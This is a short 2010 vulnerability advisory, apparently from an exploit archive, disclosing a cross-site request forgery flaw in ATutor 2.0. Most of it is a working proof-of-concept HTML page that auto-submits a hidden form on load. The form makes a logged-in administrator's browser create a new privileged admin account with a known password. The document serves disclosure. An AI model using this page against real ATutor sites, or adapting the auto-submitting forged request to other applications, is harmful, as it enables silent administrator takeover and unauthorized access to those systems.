atutor-xsrf.txt
Posted on 06 July 2010
<!------------------------------------------------------------------------ # Software................ATutor 2.0 # Vulnerability...........Cross-site Request Forgery # Download................http://www.atutor.ca/atutor/ # Release Date............7/5/2010 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://cross-site-scripting.blogspot.com/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # A cross-site request forgery vulnerability in ATutor 2.0 can be # exploited to create a new admin (new_admin/Password1). # # # --PoC--> <html> <body onload="document.forms[0].submit.click()"> <form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php"> <input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" /> <input type="hidden" name="password_error" value="" /> <input type="hidden" name="login" value="new_admin" /> <input type="hidden" name="password" value="" /> <input type="hidden" name="confirm_password" value="" /> <input type="hidden" name="real_name" value="" /> <input type="hidden" name="email" value="x@x.com" /> <input type="hidden" name="priv_admin" value="1" /> <input type="submit" name="submit" value="Save" /> </form> </body> </html>
